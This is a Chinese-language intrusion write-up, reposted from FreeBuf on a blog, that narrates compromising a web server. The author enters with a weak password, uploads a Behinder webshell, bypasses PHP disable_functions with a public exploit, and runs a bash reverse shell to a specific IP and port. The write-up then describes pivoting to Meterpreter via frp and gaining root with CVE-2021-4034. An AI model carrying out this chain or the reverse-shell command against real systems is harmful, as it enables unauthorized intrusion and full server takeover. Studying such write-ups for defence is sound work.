close
作者:一點我愛你110,轉載於freebuf。

通過fofa搜索找到了一個登錄頁面

通過一個弱口令進去了後台是這樣的

發現了文件上傳頁面,很簡單的前端過濾直接把冰蠍馬上傳,但是無法執行命令

應該是開啟了disable_function,disable_functions是php.ini中的一個設置選項,可以用來設置PHP環境禁止使用某些函數,通常是網站管理員為了安全起見,用來禁用某些危險的命令執行函數等。(eval並非PHP函數,放在disable_functions中是無法禁用的,若要禁用需要用到PHP的擴展Suhosin。)

看下禁用了哪些函數

passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

基本都禁了,百度了一番找到了一個腳本

項目地址:https://github.com/mm0r1/exploits

直接繞過了可以執行命令

直接bash反彈

bash+-i+>%26+/dev/tcp/112.74.50.219/7777+0>%261

在frp反向代理到meterpreter

查看內核

這裡使用了msf自帶的提權並沒有成功直接使用CVE-2021-4034 Polkit Pkexec本地提權

復現EXP下載地址:https://github.com/berdav/CVE-2021-4034

上傳編譯直接運行一開始沒有成功仔細看了下有個tmp目錄已經存在直接刪除在運行返回root權限。


加個好友

歡迎在看丨留言丨分享至朋友圈三連


好文推薦

2022HW必備|最全應急響應思維導圖

乾貨|後滲透及內網初體驗的總結

發現內網存活主機的各種姿勢

實戰|某次攻防演練中的分析溯源

實戰|後台getshell+提權一把梭

紅隊快速打點工具

實戰|記一次艱難的外網打點

實戰|記一次文件上傳繞過

常見漏洞安全攻防知識庫

紅隊信息搜集工具(附下載地址)

實戰—某醫院管理系統Getshell

CobaltStrike上線Linux

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()